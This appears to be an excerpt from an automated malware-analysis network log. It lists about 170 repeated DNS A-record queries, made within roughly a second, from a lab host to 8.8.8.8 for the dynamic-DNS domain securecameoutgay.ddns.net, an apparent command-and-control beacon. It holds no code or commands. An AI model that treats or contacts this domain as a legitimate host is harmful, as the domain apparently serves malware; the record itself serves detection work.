                                                    Oct 12, 2024 23:05:32.954133034 CEST192.168.2.148.8.8.80xe7cbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.960841894 CEST192.168.2.148.8.8.80xe7cbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.967649937 CEST192.168.2.148.8.8.80xc509Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.974673986 CEST192.168.2.148.8.8.80xc509Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.981446028 CEST192.168.2.148.8.8.80xc509Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.988223076 CEST192.168.2.148.8.8.80xc509Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.995174885 CEST192.168.2.148.8.8.80xc509Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.002319098 CEST192.168.2.148.8.8.80xec79Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.009696007 CEST192.168.2.148.8.8.80xec79Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.016731024 CEST192.168.2.148.8.8.80xec79Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.024144888 CEST192.168.2.148.8.8.80xec79Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.031130075 CEST192.168.2.148.8.8.80xec79Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.038225889 CEST192.168.2.148.8.8.80x7ec6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.045341015 CEST192.168.2.148.8.8.80x7ec6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.051969051 CEST192.168.2.148.8.8.80x7ec6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.058725119 CEST192.168.2.148.8.8.80x7ec6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.065730095 CEST192.168.2.148.8.8.80x7ec6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.072581053 CEST192.168.2.148.8.8.80x2b5bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.079212904 CEST192.168.2.148.8.8.80x2b5bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.085810900 CEST192.168.2.148.8.8.80x2b5bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.092835903 CEST192.168.2.148.8.8.80x2b5bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.099514008 CEST192.168.2.148.8.8.80x2b5bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.106501102 CEST192.168.2.148.8.8.80xe6e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.113193035 CEST192.168.2.148.8.8.80xe6e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.119874954 CEST192.168.2.148.8.8.80xe6e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.126353025 CEST192.168.2.148.8.8.80xe6e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.133055925 CEST192.168.2.148.8.8.80xe6e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.140074968 CEST192.168.2.148.8.8.80xadc4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.146558046 CEST192.168.2.148.8.8.80xadc4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.153055906 CEST192.168.2.148.8.8.80xadc4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.159722090 CEST192.168.2.148.8.8.80xadc4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.166347027 CEST192.168.2.148.8.8.80xadc4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.173166037 CEST192.168.2.148.8.8.80xce15Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.180107117 CEST192.168.2.148.8.8.80xce15Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.187072039 CEST192.168.2.148.8.8.80xce15Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.193933010 CEST192.168.2.148.8.8.80xce15Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.200504065 CEST192.168.2.148.8.8.80xce15Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.207365990 CEST192.168.2.148.8.8.80x1280Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.214273930 CEST192.168.2.148.8.8.80x1280Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.221575975 CEST192.168.2.148.8.8.80x1280Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.228106022 CEST192.168.2.148.8.8.80x1280Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.234714031 CEST192.168.2.148.8.8.80x1280Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.241674900 CEST192.168.2.148.8.8.80xb96cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.248662949 CEST192.168.2.148.8.8.80xb96cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.255657911 CEST192.168.2.148.8.8.80xb96cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.262259007 CEST192.168.2.148.8.8.80xb96cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.268780947 CEST192.168.2.148.8.8.80xb96cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.276626110 CEST192.168.2.148.8.8.80x618Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.283482075 CEST192.168.2.148.8.8.80x618Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.290317059 CEST192.168.2.148.8.8.80x618Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.296813011 CEST192.168.2.148.8.8.80x618Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.303503036 CEST192.168.2.148.8.8.80x618Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.310188055 CEST192.168.2.148.8.8.80x3282Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.316884041 CEST192.168.2.148.8.8.80x3282Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.323636055 CEST192.168.2.148.8.8.80x3282Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.330317974 CEST192.168.2.148.8.8.80x3282Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.337023020 CEST192.168.2.148.8.8.80x3282Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.343591928 CEST192.168.2.148.8.8.80x9531Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.350106955 CEST192.168.2.148.8.8.80x9531Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.357419014 CEST192.168.2.148.8.8.80x9531Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.364161015 CEST192.168.2.148.8.8.80x9531Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.370563030 CEST192.168.2.148.8.8.80x9531Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.377093077 CEST192.168.2.148.8.8.80x7ccStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.383544922 CEST192.168.2.148.8.8.80x7ccStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.390146971 CEST192.168.2.148.8.8.80x7ccStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.396465063 CEST192.168.2.148.8.8.80x7ccStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.403397083 CEST192.168.2.148.8.8.80x7ccStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.410517931 CEST192.168.2.148.8.8.80x2fa7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.417026997 CEST192.168.2.148.8.8.80x2fa7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.423585892 CEST192.168.2.148.8.8.80x2fa7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.430135965 CEST192.168.2.148.8.8.80x2fa7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.436600924 CEST192.168.2.148.8.8.80x2fa7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.443128109 CEST192.168.2.148.8.8.80xa055Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.449714899 CEST192.168.2.148.8.8.80xa055Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.456463099 CEST192.168.2.148.8.8.80xa055Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.463486910 CEST192.168.2.148.8.8.80xa055Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.469928026 CEST192.168.2.148.8.8.80xa055Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.476371050 CEST192.168.2.148.8.8.80xf068Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.482772112 CEST192.168.2.148.8.8.80xf068Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.489309072 CEST192.168.2.148.8.8.80xf068Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.495702028 CEST192.168.2.148.8.8.80xf068Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.502553940 CEST192.168.2.148.8.8.80xf068Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.509181976 CEST192.168.2.148.8.8.80x74d4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.516019106 CEST192.168.2.148.8.8.80x74d4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.522504091 CEST192.168.2.148.8.8.80x74d4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.528985977 CEST192.168.2.148.8.8.80x74d4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.535511971 CEST192.168.2.148.8.8.80x74d4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.542176962 CEST192.168.2.148.8.8.80x6f45Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.548412085 CEST192.168.2.148.8.8.80x6f45Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.554945946 CEST192.168.2.148.8.8.80x6f45Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.561407089 CEST192.168.2.148.8.8.80x6f45Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.567905903 CEST192.168.2.148.8.8.80x6f45Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.574455023 CEST192.168.2.148.8.8.80xba3fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.580934048 CEST192.168.2.148.8.8.80xba3fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.587507963 CEST192.168.2.148.8.8.80xba3fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.594098091 CEST192.168.2.148.8.8.80xba3fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.600774050 CEST192.168.2.148.8.8.80xba3fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.607409000 CEST192.168.2.148.8.8.80x46fcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.613775969 CEST192.168.2.148.8.8.80x46fcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.620820999 CEST192.168.2.148.8.8.80x46fcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.627372026 CEST192.168.2.148.8.8.80x46fcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.633919954 CEST192.168.2.148.8.8.80x46fcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.640381098 CEST192.168.2.148.8.8.80xc9bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.646831989 CEST192.168.2.148.8.8.80xc9bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.653521061 CEST192.168.2.148.8.8.80xc9bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.660185099 CEST192.168.2.148.8.8.80xc9bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.666670084 CEST192.168.2.148.8.8.80xc9bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.673357964 CEST192.168.2.148.8.8.80x3138Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.679886103 CEST192.168.2.148.8.8.80x3138Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.686664104 CEST192.168.2.148.8.8.80x3138Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.693639040 CEST192.168.2.148.8.8.80x3138Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.700397015 CEST192.168.2.148.8.8.80x3138Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.706703901 CEST192.168.2.148.8.8.80xe21aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.713408947 CEST192.168.2.148.8.8.80xe21aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.719728947 CEST192.168.2.148.8.8.80xe21aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.726505041 CEST192.168.2.148.8.8.80xe21aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.733283997 CEST192.168.2.148.8.8.80xe21aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.740144968 CEST192.168.2.148.8.8.80xd17cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.746592045 CEST192.168.2.148.8.8.80xd17cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.754251003 CEST192.168.2.148.8.8.80xd17cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.763681889 CEST192.168.2.148.8.8.80xd17cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.770330906 CEST192.168.2.148.8.8.80xd17cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.776746988 CEST192.168.2.148.8.8.80xaa36Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.783226013 CEST192.168.2.148.8.8.80xaa36Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.789760113 CEST192.168.2.148.8.8.80xaa36Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.796044111 CEST192.168.2.148.8.8.80xaa36Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.802583933 CEST192.168.2.148.8.8.80xaa36Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.809104919 CEST192.168.2.148.8.8.80x3feeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.815607071 CEST192.168.2.148.8.8.80x3feeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.822067976 CEST192.168.2.148.8.8.80x3feeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.828480005 CEST192.168.2.148.8.8.80x3feeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.835020065 CEST192.168.2.148.8.8.80x3feeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.842000008 CEST192.168.2.148.8.8.80xbcedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.848737955 CEST192.168.2.148.8.8.80xbcedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.855288982 CEST192.168.2.148.8.8.80xbcedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.861726046 CEST192.168.2.148.8.8.80xbcedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.868381977 CEST192.168.2.148.8.8.80xbcedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.874980927 CEST192.168.2.148.8.8.80xf88cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.881299973 CEST192.168.2.148.8.8.80xf88cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.889430046 CEST192.168.2.148.8.8.80xf88cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.896015882 CEST192.168.2.148.8.8.80xf88cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.902837038 CEST192.168.2.148.8.8.80xf88cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.909950972 CEST192.168.2.148.8.8.80x94f6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.916728973 CEST192.168.2.148.8.8.80x94f6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.922996044 CEST192.168.2.148.8.8.80x94f6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.929490089 CEST192.168.2.148.8.8.80x94f6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.936219931 CEST192.168.2.148.8.8.80x94f6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.942816019 CEST192.168.2.148.8.8.80x9809Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.950747967 CEST192.168.2.148.8.8.80x9809Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.957921028 CEST192.168.2.148.8.8.80x9809Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.964353085 CEST192.168.2.148.8.8.80x9809Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.970982075 CEST192.168.2.148.8.8.80x9809Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.977545023 CEST192.168.2.148.8.8.80x664eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.984580994 CEST192.168.2.148.8.8.80x664eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.991103888 CEST192.168.2.148.8.8.80x664eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:33.997811079 CEST192.168.2.148.8.8.80x664eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.004659891 CEST192.168.2.148.8.8.80x664eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.011931896 CEST192.168.2.148.8.8.80xe57cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.018666029 CEST192.168.2.148.8.8.80xe57cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.025141954 CEST192.168.2.148.8.8.80xe57cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.031841040 CEST192.168.2.148.8.8.80xe57cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.038598061 CEST192.168.2.148.8.8.80xe57cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.045095921 CEST192.168.2.148.8.8.80xcb2eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.052035093 CEST192.168.2.148.8.8.80xcb2eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.058700085 CEST192.168.2.148.8.8.80xcb2eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.065604925 CEST192.168.2.148.8.8.80xcb2eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.072519064 CEST192.168.2.148.8.8.80xcb2eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.079144001 CEST192.168.2.148.8.8.80x296dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.085814953 CEST192.168.2.148.8.8.80x296dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.092453003 CEST192.168.2.148.8.8.80x296dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.099014044 CEST192.168.2.148.8.8.80x296dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.105626106 CEST192.168.2.148.8.8.80x296dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.112843037 CEST192.168.2.148.8.8.80x81cfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.119784117 CEST192.168.2.148.8.8.80x81cfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.126245975 CEST192.168.2.148.8.8.80x81cfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.132879972 CEST192.168.2.148.8.8.80x81cfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.139652967 CEST192.168.2.148.8.8.80x81cfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.146375895 CEST192.168.2.148.8.8.80xa968Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.152970076 CEST192.168.2.148.8.8.80xa968Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.159709930 CEST192.168.2.148.8.8.80xa968Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.166599035 CEST192.168.2.148.8.8.80xa968Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.173804998 CEST192.168.2.148.8.8.80xa968Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.180443048 CEST192.168.2.148.8.8.80x1b9fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.187058926 CEST192.168.2.148.8.8.80x1b9fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.193416119 CEST192.168.2.148.8.8.80x1b9fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.199924946 CEST192.168.2.148.8.8.80x1b9fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.206604004 CEST192.168.2.148.8.8.80x1b9fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.213201046 CEST192.168.2.148.8.8.80xe993Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
